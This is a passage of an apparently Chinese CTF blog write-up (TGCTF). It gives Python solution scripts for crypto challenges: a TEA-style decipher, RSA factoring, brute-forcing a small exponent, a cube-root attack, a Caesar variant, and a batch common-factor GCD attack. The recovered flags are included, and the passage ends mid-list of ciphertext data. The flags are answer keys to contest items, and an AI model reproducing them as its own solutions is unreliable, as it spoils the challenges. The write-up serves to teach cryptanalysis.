32 \u4f4d\u6574\u6570\u6309\u5927\u7aef\u987a\u5e8f\u5206\u89e3\u6210 4 \u4e2a\u5b57\u7b26\u3002<br>    \"\"\"<br>    result = bytearray()<br>    for val in values:<br>        # \u4f7f\u7528 struct.pack \u5c06\u6574\u6570\u8f6c\u6362\u4e3a\u5927\u7aef\u5b57\u8282\u5e8f<br>        result.extend(struct.pack(\"&gt;I\", val))<br>    # \u89e3\u7801\u4e3a ASCII \u5b57\u7b26\u4e32\uff08\u5047\u8bbe\u7ed3\u679c\u5747\u4e3a\u53ef\u6253\u5370\u5b57\u7b26\uff09<br>    print(\"Decrypted flag: \" + result.decode('utf-8', errors='replace'))<br>def main():<br>    # \u5bc6\u94a5\u6570\u7ec4<br>    key = [0x000019F8, 0x000011BE, 0x00000991, 0x00003418]<br>    # \u5f85\u89e3\u5bc6\u7684 uint32_t \u6570\u636e\uff08\u5bc6\u6587\uff09<br>    v = [<br>        0x8CCB2324, 0x09A7741A, 0xFB3C678D, 0xF6083A79,<br>        0xF1CC241B, 0x39FA59F2, 0xF2ABE1CC, 0x17189F72<br>    ]<br>    # \u663e\u793a\u52a0\u5bc6\u6570\u636e<br>    print_data(\"Encrypted data:\", v)<br>    print(\"Decrypting data...\")<br>    # \u6309\u539f\u903b\u8f91\uff1a\u4ece\u540e\u5f80\u524d\u5bf9\u76f8\u90bb\u4e24\u4e2a uint32_t \u8fdb\u884c\u89e3\u5bc6\uff08\u4ece v[6] \u5f00\u59cb\u5230 v[0]\uff09<br>    for i in range(6, -1, -1):<br>        v[i], v[i+1] = decipher(DELTA, v[i], v[i+1], key)<br>        # \u663e\u793a\u89e3\u5bc6\u540e\u7684 uint32_t \u6570\u636e<br>print_data(\"Decrypted uint32_t values:\", v)<br># \u6253\u5370\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\u540e\u7684\u7ed3\u679c<br>print_as_string(v)<br>if name == \"main\":<br>    main()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"176\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638780-\u56fe\u7247-1024x176.png\" alt=\"\" class=\"wp-image-179\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638780-\u56fe\u7247-1024x176.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638780-\u56fe\u7247-300x51.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638780-\u56fe\u7247-768x132.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638780-\u56fe\u7247.png 1032w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Crypto<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u8d39\u514b\u7279\u5c14<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u7528Factordb\u5206\u89e3n<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"225\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247-1024x225.png\" alt=\"\" class=\"wp-image-180\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247-1024x225.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247-300x66.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247-768x169.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247-1536x338.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638784-\u56fe\u7247.png 1668w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">exp<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from sympy import mod_inverse<br>from Crypto.Util.number import long_to_bytes<br># \u5df2\u77e5 RSA \u53c2\u6570<br>c = 670610235999012099846283721569059674725712804950807955010725968103642359765806<br>n = 810544624661213367964996895060815354972889892659483948276203088055391907479553<br>e = 65537<br>p1 = 113<br>p2 = 18251<br>p3 = 2001511<br>p4 = 214168842768662180574654641<br>p5 = 916848439436544911290378588839845528581<br># \u8ba1\u7b97\u6b27\u62c9\u51fd\u6570 \u03c6(n) = (p1-1)*(p2-1)*(p3-1)*(p4-1)*(p5-1)<br>phi = (p1 - 1) * (p2 - 1) * (p3 - 1) * (p4 - 1) * (p5 - 1)<br># \u8ba1\u7b97\u79c1\u94a5\u6307\u6570 d\uff0c\u4f7f\u5f97 d*e \u2261 1 (mod \u03c6(n))<br>d = mod_inverse(e, phi)<br># RSA \u89e3\u5bc6\uff1a\u8ba1\u7b97 m = c^d mod n<br>m = pow(c, d, n)<br># \u5c06\u89e3\u5bc6\u5f97\u5230\u7684\u6574\u6570\u8f6c\u6362\u4e3a\u5b57\u8282\u4e32\uff0c\u518d\u89e3\u7801\uff08\u5982\u679c\u53ef\u80fd\u7684\u8bdd\uff09<br>plaintext_bytes = long_to_bytes(m)<br>try:<br>    plaintext = plaintext_bytes.decode()<br>except UnicodeDecodeError:<br>    plaintext = plaintext_bytes  # \u5982\u679c\u4e0d\u662f\u6709\u6548\u7684\u6587\u672c\u7f16\u7801\uff0c\u5219\u4ee5\u5b57\u8282\u4e32\u5f62\u5f0f\u663e\u793a<br>print(\"\u89e3\u5bc6\u5f97\u5230\u7684\u660e\u6587\uff1a\", plaintext)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u5bc6\u5f97\u5230\u7684\u660e\u6587\uff1a TGCTF{f4888_6abdc_9c2bd_9036bb}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b9d\u5b9drsa<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>PART1<\/strong> \u4f7f\u7528\u4e24\u4e2a 512 \u4f4d\u7d20\u6570\u751f\u6210\u7684\u6a21\u6570 n\u2081\uff0c\u5e76\u201c\u968f\u673a\u201d\u9009\u53d6\u4e00\u4e2a\u8f83\u5c0f\u7684\u516c\u94a5\u6307\u6570 e\u2081\uff08\u4f4d\u6570\u4e3a 17 \u6216 18 \u4f4d\uff09\uff0c \u52a0\u5bc6\u4e86 flag \u7684\u524d\u534a\u90e8\u5206\u3002\u9898\u76ee\u53ea\u516c\u5f00\u4e86 p\u2081\u3001q\u2081 \u4e0e\u5bc6\u6587 c\u2081\uff0c\u672a\u7ed9\u51fa e\u2081\u3002 \u7531\u4e8e e\u2081 \u7684\u8303\u56f4\u8f83\u5c0f\uff08\u7ea6\u5728 2\u00b9\u2077\uff5e2\u00b9\u2078 \u533a\u95f4\u5185\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u904d\u5386\u8be5\u8303\u56f4\u5185\u6240\u6709\u7d20\u6570\u5019\u9009\u503c\uff0c\u5bf9\u6bcf\u4e2a\u5019\u9009 e\u2081 \u68c0\u67e5\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u662f\u5426\u4e0e \u03c6(n\u2081) \u4e92\u8d28<\/li>\n\n\n\n<li>\u7528\u5019\u9009\u7684 e\u2081 \u6062\u590d\u51fa\u79c1\u94a5 d\u2081\uff0c\u7136\u540e\u5bf9 c\u2081 \u89e3\u5bc6\u5f97\u5230 m\u2081<\/li>\n\n\n\n<li>\u5982\u679c\u89e3\u5bc6\u7ed3\u679c\u8f6c\u6210\u5b57\u8282\u4e32\u540e\u7b26\u5408\u6211\u4eec\u5bf9 flag\uff08\u4f8b\u5982\u4ee5 <code>flag{<\/code> \u5f00\u5934\u7b49\uff09\u7684\u9884\u671f\uff0c\u5219\u8ba4\u5b9a\u5019\u9009\u6b63\u786e<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>PART2<\/strong> \u4f7f\u7528\u4e24\u4e2a 512 \u4f4d\u7d20\u6570\u751f\u6210\u7684\u6a21\u6570 n\u2082\uff0c\u5e76\u56fa\u5b9a\u516c\u94a5\u6307\u6570 e\u2082 = 3 \u5bf9 flag \u7684\u540e\u534a\u90e8\u5206\u8fdb\u884c\u52a0\u5bc6\u3002 \u82e5 m\u2082 \u8f83\u5c0f\uff08\u65e0\u9700\u6a21 n\u2082 \u7684\u5f52\u7ea6\uff09\uff0c\u5219\u6709<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">c2=m23c\u2082 = m\u2082^3c2=m23<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u65f6\u53ef\u5229\u7528\u6574\u6570\u7acb\u65b9\u6839\u76f4\u63a5\u6062\u590d m\u2082\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from math import gcd<br>from sympy import primerange, mod_inverse, integer_nthroot<br>from Crypto.Util.number import long_to_bytes<br>p1 = 8362851990079664018649774360159786938757293294328116561219351503022492961843907118845919317399785168488103775809531198339213009936918460080250107807031483<br>q1 = 8312546034426788223492083178829355192676175323324230533451989649056072814335528263136523605276378801682321623998646291206494179416941978672637426346496531<br>c1 = 39711973075443303473292859404026809299317446021917391206568511014894789946819103680496756934914058521250438186214943037578346772475409633145435232816799913236259074769958139045997486622505579239448395807857034154142067866860431132262060279168752474990452298895511880964765819538256786616223902867436130100322<br>n1 = p1 * q1<br>phi1 = (p1 - 1) * (q1 - 1)<br>print(\"\u5f00\u59cb\u7834\u89e3 PART1 ...\")<br>found_e1 = None<br>m1_recovered = None<br>for e_candidate in primerange(2**17, 2**18):<br>  if gcd(e_candidate, phi1) == 1:<br>\u200b    try:<br>\u200b      d = mod_inverse(e_candidate, phi1)<br>\u200b    except Exception:<br>\u200b      continue<br>\u200b    m1_candidate = pow(c1, d, n1)<br>\u200b    flag_part1 = long_to_bytes(m1_candidate)<br>\u200b    if b\"TGCTF{\" in flag_part1:<br>\u200b      found_e1 = e_candidate<br>\u200b      m1_recovered = flag_part1<br>\u200b      print(\"\u627e\u5230\u6b63\u786e\u7684 e1\uff1a\", e_candidate)<br>\u200b      print(\"PART1 \u89e3\u5bc6\u7ed3\u679c:\", flag_part1)<br>\u200b      break<br>if found_e1 is None:<br>  print(\"\u672a\u80fd\u5728\u5019\u9009 e1 \u4e2d\u627e\u5230\u5408\u9002\u7684\u89e3\u5bc6\u7ed3\u679c\uff0c\u53ef\u80fd\u9700\u8981\u624b\u52a8\u5224\u65ad\u89e3\u5bc6\u51fa\u7684\u6570\u636e\u3002\")<br>else:<br>  print(\"\\nPART1 \u7684 flag\uff08\u524d\u534a\u90e8\u5206\uff09\u6062\u590d\u6210\u529f\u3002\")<br>n2 = 103873139604388138367962901582343595570773101048733694603978570485894317088745160532049473181477976966240986994452119002966492405873949673076731730953232584747066494028393377311943117296014622567610739232596396108513639030323602579269952539931712136467116373246367352649143304819856986264023237676167338361059<br>c2 = 51380982170049779703682835988073709896409264083198805522051459033730166821511419536113492522308604225188048202917930917221<br>e2 = 3<br>print(\"\\n\u5f00\u59cb\u7834\u89e3 PART2 ...\")<br>m2, exact = integer_nthroot(c2, e2)<br>if exact:<br>  flag_part2 = long_to_bytes(m2)<br>  print(\"PART2 \u89e3\u5bc6\u7ed3\u679c:\", flag_part2)<br>else:<br>  print(\"c2 \u4e0d\u662f\u5b8c\u6574\u7684\u7acb\u65b9\u6570\uff0c\u8fd8\u539f\u5931\u8d25\uff0c\u8bf7\u68c0\u67e5\u6570\u636e\u6216\u5c1d\u8bd5\u5176\u5b83\u65b9\u6cd5\u3002\")<br>if m1_recovered is not None and exact:<br>  flag_full = m1_recovered + flag_part2<br>  print(\"\\n\u5b8c\u6574 flag:\", flag_full)<br>else:<br>  print(\"\\n\u7531\u4e8e\u90e8\u5206\u6570\u636e\u672a\u80fd\u6062\u590d\uff0cflag \u5c1a\u672a\u5b8c\u6574\u6062\u590d\u3002\")<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"496\" height=\"226\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638795-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-181\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638795-\u56fe\u7247.png 496w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638795-\u56fe\u7247-300x137.png 300w\" sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">AAAAAAAA\u00b7\u771f\u00b7\u7b7e\u5230<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u773c\u51ef\u6492\uff0c\u7b2c\u4e00\u4e2a\u6570\u5b5725\uff0c\u540e\u9762\u6bcf\u4e00\u4f4d\u9012\u589e1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"607\" height=\"794\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638815-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-184\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638815-\u56fe\u7247.png 607w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638815-\u56fe\u7247-229x300.png 229w\" sizes=\"auto, (max-width: 607px) 100vw, 607px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">def caesar_cipher_decrypt(ciphertext, start_offset):<br>    decrypted_message = \"\"<br>    offset = start_offset<br>    for char in ciphertext:<br>        if char.isalpha(): <br>            base = ord('A') if char.isupper() else ord('a')<br>            decrypted_char = chr((ord(char) - base + offset) % 26 + base) <br>            decrypted_message += decrypted_char<br>        elif char.isdigit():  <br>            decrypted_char = chr((ord(char) - ord('0') + offset) % 10 + ord('0')) <br>            decrypted_message += decrypted_char<br>        else:<br>            decrypted_message += char <br>        offset += 1 <br>    return decrypted_message<br>ciphertext = \"UGBRC{RI0G!O04_5C3_OVUI_DV_MNTB}\"<br>start_offset = 25<br>print(caesar_cipher_decrypt(ciphertext, start_offset))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"474\" height=\"225\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638809-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-183\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638809-\u56fe\u7247.png 474w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638809-\u56fe\u7247-300x142.png 300w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b57\u6bcd\u5bf9\u4e0d\u4e0a\uff0c\u8bf4\u660e\u6570\u5b57\u5bf9\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"782\" height=\"53\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638820-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-185\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638820-\u56fe\u7247.png 782w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638820-\u56fe\u7247-300x20.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638820-\u56fe\u7247-768x52.png 768w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed9\u6570\u5b57\u6539\u56de\u53bb\u5c31\u884c TGCTF{WO0O!Y04_5R3_GOOD_AT_MOVE}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">mm\u4e0d\u8eb2\u732b\u732b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u516c\u56e0\u5b50\u6f0f\u6d1e<\/strong> \u5f53\u591a\u4e2a RSA \u6a21\u6570 n\u2081, n\u2082, \u2026 \u51fa\u73b0\u5171\u7528\u67d0\u4e2a\u7d20\u6570\uff08\u5047\u8bbe p\uff09\u65f6\uff0c\u5982\u679c\u6709 \u2003gcd(n\u1d62, n\u2c7c) = p \uff08p &gt; 1\uff09 \u5219\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u5171\u56e0\u5b50\u5c06\u4e24\u4e2a\u6a21\u6570\u5404\u81ea\u5206\u89e3\u4e3a \u2003n\u1d62 = p \u00b7 q\u1d62\u2003\u2003\u2003n\u2c7c = p \u00b7 q\u2c7c \u4e00\u65e6\u77e5\u9053\u4e86 p \u4e0e\u5176\u4e2d\u4e00\u4e2a n \u7684\u53e6\u4e00\u4e2a\u56e0\u5b50 q\uff0c\u5373\u53ef\u8ba1\u7b97 Euler \u51fd\u6570 \u2003\u03c6(n) = (p \u2013 1)(q \u2013 1) \u4e4b\u540e\u5229\u7528 e \u6c42\u51fa\u79c1\u94a5 d\uff08\u6ee1\u8db3 d \u00b7 e \u2261 1 mod \u03c6(n)\uff09\uff0c\u7ee7\u800c\u89e3\u5bc6\u5bc6\u6587\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u6279\u91cf\u6c42 gcd<\/strong> \u7531\u4e8e\u9898\u76ee\u7ed9\u51fa 307 \u7ec4 (n, c)\uff0c\u5e38\u7528\u624b\u6cd5\u662f\u5bf9\u6240\u6709\u6a21\u6570\u8fdb\u884c\u4e24\u4e24\u6c42 gcd\uff08\u5373\u904d\u5386\u6240\u6709 (n\u1d62, n\u2c7c) \u5bf9\uff09\uff0c\u627e\u51fa\u90a3\u4e9b gcd &gt; 1 \u7684\u60c5\u51b5\u3002\u8fd9\u6837\u53ef\u4ee5\u5c06\u5927\u90e8\u5206\u5b58\u5728\u95ee\u9898\u7684\u6a21\u6570\u5206\u89e3\u51fa\u6765\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u6062\u590d\u79c1\u94a5\u5e76\u89e3\u5bc6<\/strong> \u5bf9\u4e8e\u6bcf\u4e2a\u88ab\u6210\u529f\u5206\u89e3\u7684\u6a21\u6570 n\uff0c\u53ef\u4ee5\u6c42\u51fa\uff1a \u2003p = gcd(n\u1d62, n\u2c7c) \u2003q = n\u1d62 \/ p \u5f97\u5230 \u03c6(n\u1d62) \u540e\u518d\u8ba1\u7b97\u79c1\u94a5 d\uff0c\u6700\u540e\u5229\u7528\u5feb\u901f\u5e42\u7b97\u6cd5\u89e3\u5bc6 \u2003m \u2261 c^d mod n \u4ece m \u4e2d\u8f6c\u6362\u51fa\u660e\u6587\u5b57\u7b26\u4e32\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">exp:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import math<br>from Crypto.Util.number import inverse, long_to_bytes<br>data = [<br>    (int(\"104620414822063385079326749509982471870030893600285414264987224935916290272601764523383209465433613538037960991762459760833469310204135961581840403511596166088644211015428546275493892988418626726155859624501730928694822384537353845736516967991087412959351952563730377463899768183476698424362423043497737906623\"),<br>     int(\"46039211893589761388229614285558239355119695176816949068907191054207506730440947101388028710988726734999719468830467682553990941948390688315715650976965231516653707125993971747796355564587123089802425266994022342763366946693028597366959030863496254672081216842747104144465753908738135854355761032614829767801\")),<br>    (int(\"136155385285881847647215965185525314111620437662648298206297512719879362719618304990758477078778565820295983050789197481446196249495631490160624235332536575107813683782766081951446123450465630897720159758797590205308439297488584076508093180968162324630134629769513496515404803402321721368832460090329222421827\"),<br>     int(\"89662183394841207920629365819797260101947925700835102302177181731227878954957449881945530912024549859105187175733895858270028583699811542603429941425305090712263572930206869292032730915960185806373681528825761306228562959997158901987273897776177362099560025615451752245984242926480186459915665627188585304468\")),<br>    (int(\"97838166150880996322271330309067876274369629304288765249967974468367105054047299499596040632925907384502862419004673114223665726506104837885822909371569060745589002030380969587694083056125880529762088534900418072441378759571612290245967363366712440121861026216057485493561216431656619679041625036650956580141\"),<br>     int(\"13964437454524296084510225903229161859257123876632697866040207708487126396198332364645709267606449694929792345209792570053510791963531448336253575726210469465864539890677252499866753713612441273667882500168058017224495736582505959700480874460389262074140652815959688469055699161959913579169401470659235115109\")),<br>    (int(\"104414012452710814870605097680598206512628379244374492767447479240624513395489881648267796649097204325681020437139111489809239200240891543325545119842310141868094306405364856531235723882286394670951990820247279699581908662322090700977209258378235724854303512782381876653582770637338146610370083320542016205683\"),<br>     int(\"82881158840663752381301293012156412156837667139486617975885122294931414239233800584880788452785824426565433162837294264882670497672373640661237256739513251217169843502230708215107997955489103032973333421550906077697455003620266617859876793492495921562432213017574083204710327670808824909752320056069246239174\")),<br>    (int(\"99823327577152655919881942955430441203405862718412557750434832628874011564431142403116162320302719502032615315370431727445122354675365173475960959108842673705131185515432235779337198687430269502043589489978848478071330885198888066287011818540897074331277424039757182998605121722943855660357645805326677153717\"),<br>     int(\"64138140240395665924604130130703540113256964046054792668268574048575684146042187358538769647646826411085147480827784068745180715064157256643530984132712374746041235071459578557497303083281429793485934099219969514633245125822049070217273545487615694689955426204739083406630834370776842330036968574339849312190\")),<br>    (int(\"90248365015461553299898947837419575685297696972462936965177693228158751120540052910252324465443891464072089492969551376378871872695721660747109548018879225735392583821723157787309278187199003459586595097068752600095247478763948136028872918472784517794186246938117176464805239704409618972143063753329505566853\"),<br>     int(\"1223888729370280608766408497925046298425450348475284427245593721486677451374468326993646894433196784805828316395498508329520722177308210723319637874241965908787713633812806440948367216379440947308444484034237493420426695742994319947973787416278207394357344618722581642427663321180647265844445386795487560858\")),<br>    (int(\"94301600004957404266556049084426784947851528267810628496480180851237620577304221709916982386576998311327072033147184826449394769608326104893954128903966864163663992266019244394627758978231671671541415036785806102418923157988170641749789081578513122682013855878981445323502941212687339286209950916049829329187\"),<br>     int(\"82863658163999555104982625957574084596896562517734036934606118180244186596013418259858429681535345561639916993457165170775791581510308180862345406598823456939294419306667134634269429977644283692866602683240830596570130273545693685907124378153685099119789311788059184914707444767893674300246508953649015681088\")),<br>    (int(\"138170846301125942544269528744423947570529693718702890060589562072507810299909374867578243513284575250911481367534521588818327369799372617013333797662648828094081675473684406506957984907476220469711444738611866548585674505249902648164090122673746393223709022870555269699592064314818239962909612890442312536933\"),<br>     int(\"119491008614166618841992196881667810795520664399142702036770629613897435080974181361028261908409801454926881075401108841568189702203622458656829859177063551730844676750575953975812052429747999704001795514743286102185049083720492556614745899457272537611852473621247097119159488258837994164495342656615476302293\")),<br>    (int(\"99901179729466406997922350743173808335015436647254619150427257167185543967050112627966407293196288285044671444967319335613534165252968178742796010193662584739560998687124865190606432448575536720824666312791430118010828122012890994586807518564096074794014835645108286554069368202103540075137356780856603244771\"),<br>     int(\"40949907108391333609720915101613553123371146309830061575032335884884685212781529054807943471531015409944714724754037484012671956839250763388297109533737287622070764203904098500668030151150924717345985380483608467246475689588355409720763724390243856239025656921590604001847453755775742556441416378253225782045\")),<br>    (int(\"61259690030437494665426739847257152273395280130837116404942961022205772370190262747451577687684105785729566638453953643821737649627970942826417199458528269898125881584665758246625505537450238486870409634480317106977874179837348319750569863206089421857959928948968490914332458264088528882363587362546115476251\"),<br>     int(\"10692583709802517287930376649896453621521035451564315558444774153067965107653136923487082233843270601808293644966170765029706088111741391700718327393258142617729248507339361448214949280176995019279632751180066719588055722391265746855172906890300921322899541689661567468774910639893953734407333686955281968991\")),<br>    (int(\"61801039992828445962366192979879213579034618929625634137120257905363978638538524619375061476757245266904915273416909418840046887399433511888387463824393594567840703853932743962712886373493942192676347226424517033517271152629683484135645803084066312864114637935053614714648933122150287993866439987611541220969\"),<br>     int(\"10954274353991105637557727664545210588822691288407080879449837043794604324870247005437716228395288744012991388616203129640408571481134055220861654888292000079401922754349164416070902140135750687970710746596746307040822491545884725291812622162525094521528191986864571199953770504742086093754298024706688942928\")),<br>    (int(\"81076578036433170079082060836251685409287159446492965753296193307212279343201967736475565889190946261084018661195513222887762729102719817463298142435098272288250455906191971306724773977704843489656384202130835772028461187750372122197493270556005946889088028901632597942947850025951446511574872271538279172293\"),<br>     int(\"28588867978892890299123101792867355705290435712099342525411465487097050420749940637639374841366314897499067089478542918061978965078760947752781916587927764087734267821483523703898120835527780177065213641081291514925902487762337571992584303375758239828857480300529159002038173766923215063406196287270281994110\")),<br>    (int(\"71157530232168231071136890858912616050720830400022706299714461019258910354851417650227422961886365022306141477702824881599077623195801641964057263386031786220270890082089447766654209469387927987335260990984685945401925861903655650392938594865200916004709406149687172952181674325358107989641197765842163904547\"),<br>     int(\"27960181215930944825487403120483445285549624807444954861078101716612013743479552799262420582301067324579888715200194831185242773332005168956859526124595540207082642989519872446505766401363375766517640847713946346877947806553907090624698961288800133781997732503324975289915749170584907965906576569454791362716\")),<br>    (int(\"66972648047375401600966868890460223407049464787687477233543254745626282151414582703711121179221058247651761267900898225903976203880613931632194874983043030539016993590676102349957616653491527988171250828064867642424963623959132504648424440781640680504700708119332029568543096316060268809505043468916214805513\"),<br>     int(\"60835135959791008690787814428104042871068368305340120883899568388232284733018967302193949855079169482639685706640962794034354074444182486368506005576035610719914663064491492453959532118366777810500578191258738886381059084295580203383314309232955684615288245065267787325644339730306113924643772851852254974447\")),<br>    (int(\"90257637943598108316769497507794508593198806302392993521070418011991721766720752879485768447222083665431446115452523069625768629087198843486179127627688891514510660821010755020225100968675551771499095646313769726939397657740949967858530715457699721915837776214979058584769812249030196060963967766503952342313\"),<br>     int(\"4399313549134622905685042154653087546829550910787423655419326566487878138253206359509288756495066332688825657315393329979416459694050238332939436214209529989902054986831591699570809096389539557895185915401991616918262699503508747929872338216502127614214065785380825327547608094369072262475865753199634917243\")),<br>    (int(\"92288251740600331464419220550566043483318956046633993383068422751131440697160804724009965543419750026416145402171946239689160353343558812650051732083425661211116525981882827129786285507421384186253914385945235839575942689159175143843170584595031563834194522396791461112821621800304795101789634774174454963923\"),<br>     int(\"66247987728121195021048077968716090081849970921058095317354141115909675926873116470141983756969079542376202625155266240762945918052265405682130314708469394971687236301195491947843935012259628382158162193578005325779969088722810703761417697325724612365005066194053189048901730077756974814700579148238309842127\")),<br>    (int(\"69827077115568693338658530875808427671954833979587031673719819999982837118678966004630045025949355988108488971089469456573587826096181206180504021005589295303686058202337425160037577216512544874916659317879664486251344000204924121435478175340685277219630619759748397121310072824905427346314024289371793912511\"),<br>     int(\"41961541529750170616647278321641897011519854170766331727250048812589068480312085578768151129262884426947065380762103627693081345115074811616528854812168141383304088815422297153742050890507255438405990962029560578841792672129077703992563889849131151026125890119428775426873159430059036108088873321237025365358\")),<br>    (int(\"121967509067813105411086531144570873813192438551353178244135305741941444885017879430265551135740001199881109528100015326618038641360496483748825955036785972103400120249819219515635771224670126658284122783204302878023875811221532401827466979985960758004984121521325952830430974045801555031712045538716943996723\"),<br>     int(\"56685268855458449301807361992185903395597392151912521111631437180065784801852096532529914802338195640469288263142147157273947747638162749552053228362964253085471152499570837646190222747929748096979121775764723331627546226024083599380351478409656463017930399581089017887517605437054166812501653272994305049733\")),<br>    (int(\"111443052209737188054980912596162706015139783786609288606533946708676690565398361227327894393619361319986987105479808487817585338876690712274387199821822463901215385473552030769905055879411818185403467682658270584733008692794033574579656016628470672448456704070463193623651351708851493606658113454562567882661\"),<br>     int(\"43063936534303512947747167344506435082446824926097920117523394928030369927880018399419359991527162493235267016416838487018780946144446357441103107132169534930859416679537307845573892372204094363648842008627025957417743819712548780548638411753631418121273062911493469263026439608376883943145341779233547349322\")),<br>    (int(\"95620970653115821773446688521489956525828853169640893473222967682133652620358237668549573949380199526055232887654104696571224326591336762618919861506923955551797033258152132330235021156256598798132150199923133163071780984430617120833384712466833259138293611424196294549754790929522798073754475302543066810743\"),<br>     int(\"91169514280852748423033050397827518019817961586213917174038858129257009995113093470448250725086280286170678089050234174099511369579341419962038031802624545869067250826450322548758429711203364340708549417927947792532084430609434623786029296423816717020689535357554451463107098397308992129847312441034090896054\")),<br>    (int(\"124459121435252896777500422250770572324857852710447484525638245458046469810759653904386808397836485937480907526066675846846520234694216388767247413055775273377784217457842271722405085516541895286181193855041203802309799146536571497448784444626120767476230109922946020087790478941065170405108420502950780133523\"),<br>     int(\"31093240913979248685149171690112008628787979057692479889383006812352691515320164771142647979614495403955948954659560787370320141750652034536411365349410185683329265665259057268279825368747472043471647395698722820688715744644164047773730191101752121825958698066913241659826405486783122723635730561796940158209\")),<br>    (int(\"81003649135399280604842700104760993194465757071677051471315130409609378910142544915378149900405963802123740729794683591795243782387944402010717523706170293193013567657184591547272086787248471917203180979462232769467918763279576984067235329340647626314893413320227300379671225813004347947887556793324907475161\"),<br>     int(\"44574763638238888886413256782673998315683494885040898927663006383199262443563576364203866155221980255226080343413308265988173997445413293009039817487501278047992287533365144990492783676929885753160063328137593489873818942984326464370764083819180424063003855862513091163320610019844965347283565770209660580060\")),<br>    (int(\"98732243816208344101089881999678229767787321192638126987232060022293171828538636055234082960150558855412662397028478679139916381771811220331027455874138797444723547224197063212061534351867173190141857439152581327894215440861514666659083641573712750230406234166746981657633453579555223087777388017141219863357\"),<br>     int(\"79986503981752061258794042676693178586447029502359747048023111795992934365242244682829429272390068037057046062309761327773405090718654650720076028550805109733579396054684907361299816676563364626187567013130090336496213340846195056940882865823569179892482289906651517251337945983544365258393137860454629191034\")),<br>    